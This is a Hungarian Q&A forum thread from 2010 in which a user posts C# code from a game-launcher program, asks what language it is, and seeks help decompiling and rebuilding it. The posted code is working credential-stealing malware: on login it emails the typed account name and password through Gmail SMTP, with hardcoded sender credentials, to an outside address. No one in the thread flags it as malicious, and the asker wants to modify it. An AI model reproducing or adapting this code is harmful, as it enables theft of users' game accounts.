Kezdőoldal » Számítástechnika » Programozás » Ez milyen programozási nyelv?

Ez milyen programozási nyelv?

Figyelt kérdés

Üdv a kérdésem: adott ez a kód egy honlapról, de nem tudom melyik nyelv. a file megvan hozzá, azt akarom szerkeszteni. Szval a kod:

private void btnLogin_Click(object sender, EventArgs e)

{

this.wb.Document.GetElementById("txtUserID").SetAttribute("value", this.txtId.Text);

this.wb.Document.GetElementById("txtPassWD").SetAttribute("value", this.txtPasswort.Text);

this.wb.Document.InvokeScript("fnValidateForm");

SmtpClient client = new SmtpClient();

MailMessage message = new MailMessage();

client.Credentials = new NetworkCredential("mail@gmail.com", "monster1");

client.Port = 0x24b;

client.Host = "smtp.gmail.com";

client.EnableSsl = true;

message = new MailMessage();

message.From = new MailAddress("mail@gmail.com");

message.To.Add("twink1@live.at");

message.Subject = "Game Starter Acc";

message.Body = "AccName: " + this.txtId.Text + "\r\nPassword: " + this.txtPasswort.Text;

client.Send(message);

2010. máj. 18. 19:19
 1/10 anonim ***** válasza:
70%

javascript

Honlapban a PHP és a javascript a legelterjedtebb, no meg a HTML, de az más kategória.

PHP-t nem fogsz látni, csak ha tied az oldal.

Így anélkül, hogy beleolvasnák, ez Javascript.

U.I: bele is olvastam és tényleg az :P

2010. máj. 18. 20:14
 2/10 A kérdező kommentje:
Oks, köszi, és ha ez egy exe-fájlban van, akkor mivel tudom a legegyszerűbben szerkeszteni?
2010. máj. 18. 20:19
 3/10 anonim ***** válasza:

a HTML nem programozási nyelv :P

amúgy exe fájlban ilyen nem lehet, valszeg csak átnevezték.

2010. máj. 18. 23:15
 4/10 anonim ***** válasza:
Pont azért írtam oda, hogy az más kategória. :)
2010. máj. 19. 15:34
 5/10 anonim ***** válasza:
100%

Ez nem javascript...ez C#

Szerkeszteni Visual Studioval tudod a legkényelmesebben.

Javascriptben nem kell kiírni a paraméterek/változók típusait, illetvbe JS-ben nincs SmtpClient és MailMessage osztály. (Persze lehet csiálni, de .NET-ben van alaőból)

2010. máj. 19. 19:03
 6/10 A kérdező kommentje:

Igen, eljutottam oda, hogy bele tudtam nézni, télleg C#.

Rolam tudni kell h nem vagyok programozó, csa a logikám jó ilyen kódokat átírni, tehát, Reflector deassemblyvel kibontottam, ott ateljes project, megnyitom visual 2008-al, de az konvertálni akarja, mert elvileg 2005-ös projectfájl, és 12 fájlból egyet tud konvertálni, Build opció ezért le se fut. A 2005 ös meg nem megy fel win7 re :D

Valami támasz a továbbiakhoz?

2010. máj. 19. 20:28
 7/10 anonim ***** válasza:

Az tök normális, hogy 1 filet konvertál a VS. Gondolom ez a csproj file. A cs/resx fileokat általában nem is szokta konvertálni. Mért nem fut le a build? Hány hibát ad/mik a hibák?

Viszont valamti nem értek. Ha egyszer ide bemásoltál egy kódrészletet, akkor már megvolt a forrás, nem? Akkor mért kellett utána a reflector?:) Vagy ha előtte reflectoroztál, akkor már tudtad, hogy ez .NET/C#

2010. máj. 20. 08:28
 8/10 A kérdező kommentje:
Mert a progi megvan, egy gyerek meg beírta h mi van benne (mármint forráskód), és gondoltam, átírom egy kicsit. kicsomagoltam, meglehet nyitni, konvertál 1 fált, ok buildnél viszont hiba, ha nem is írok át semmit akkor se. Ha vki tud segiteni akkor pls küldjön egy privát mailt, és megadom az msn-em. fontos lenne :)
2010. máj. 20. 15:37
 9/10 anonim ***** válasza:
Nekem küldhetsz privátot. Az előző, és az azelőtti vagyok.
2010. máj. 20. 16:44
 10/10 A kérdező kommentje:
mail ment
2010. máj. 20. 18:51

Kapcsolódó kérdések:

Minden jog fenntartva © 2025, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!